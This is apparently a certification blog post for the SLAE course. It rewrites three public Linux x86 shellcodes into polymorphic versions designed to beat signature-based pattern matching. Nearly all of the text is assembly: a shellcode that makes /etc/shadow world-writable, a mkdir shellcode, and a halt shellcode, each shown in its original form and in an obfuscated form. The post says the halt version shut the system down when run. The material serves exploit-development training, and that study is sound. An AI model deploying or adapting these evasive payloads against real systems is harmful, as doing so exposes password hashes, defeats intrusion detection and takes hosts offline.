This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1017

Challenge

  • Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat paLern matching
  • The polymorphic versions cannot be larger 150% of the exisSng shellcode
  • Bonus points for making it shorter in length than original

We need to modify 3 shellcodes from shellstorm.org or exploit-db.com so the shellcodes don't look like the original while maintain same functionality.

Shellcode 1: linux/x86 chmod 666 /etc/shadow

We leveraged arithmetic function such as SUB/ADD to replace original code such as /etc/shadow and 0666.

We also clear EAX at beginning of shellcode since we found that when EAX is non-zero, it will throw an error.

Link: http://shell-storm.org/shellcode/files/shellcode-566.php

Original Polymorphic Version 
; linux/x86 chmod 666 /etc/shadow 27 bytes
; [email protected]
; 2010-01-15
					
section .text
    global _start
					 
_start:
    ; chmod("//etc/shadow", 0666);
    mov al, 15
    cdq
    push edx
    push dword 0x776f6461
    push dword 0x68732f63
    push dword 0x74652f2f
    mov ebx, esp
    mov cx, 0666o
    int 0x80
 
; linux/x86 chmod 666 /etc/shadow 37 bytes
; timip
; 2017-09-10
					
section .text
  global _start

_start:
 xor eax,eax
 mov al, 15
 cdq
 push edx
 mov ecx, 0x111101b6
 mov esi, 0x665e62ab
 add esi, ecx
 push esi
 sub esi, 0xefc34fe
 push esi
 add esi, 0xbf1ffcc
 push esi
 mov ebx, esp
 int 0x80

Shellcode 2: mkdir()

Link: http://shell-storm.org/shellcode/files/shellcode-542.php

Instead of using JMP-CALL-POP method, we directly push the string into stack.

We also removed exit syscall to save space.

The shellcode size decreased from 36 bytes to 24 bytes.

Original Polymorphic Version 
section .text

global _start

_start:

jmp short call_shellcode

shellcode:

pop esi
 xor eax,eax
 mov [esi+0x6],al
 mov al,0x27
 lea ebx,[esi]
 mov cx,0x1ed
 int 0x80
 mov al,0x1
 xor ebx,ebx
 int 0x80

call_shellcode:

call dword shellcode
 push dword 0x656b6361
 fs
 db 0x23
 
section .text

global _start

_start:

pop esi
 xor eax,eax
 push eax
 push dword 0x2f2f7265
 push dword 0x6b636168
 mov al,0x27
 mov ebx,esp
 mov cx,0x1ed
 int 0x80

Shellcode 3: shutdown()

We leveraged arithmetic function such as SUB/ADD to replace original code such as /bin/shutdown.

The size increased from 30 bytes to 41 bytes.

Link: https://www.exploit-db.com/exploits/37289/

Original Polymorphic Version 
section .text
global _start

_start:
xor eax,eax
push eax
push dword 0x746c6168
push dword 0x2f2f6e69
push dword 0x62732f2f
mov ebx,esp
push eax
mov edx,esp
push ebx
mov ecx,esp
mov al,0xb
int 0x80
 
section .text
global _start

_start:
xor eax,eax
push eax
mov ecx, 0x11111111
add ecx, 0x636b5057
push ecx
sub ecx, 0x453cf2ff
push ecx
add ecx, 0x3343c0c6
push ecx
mov ebx,esp
push eax
mov edx,esp
push ebx
mov ecx,esp
mov al, 0xb
int 0x80

 

The system shutdown after we executed the command.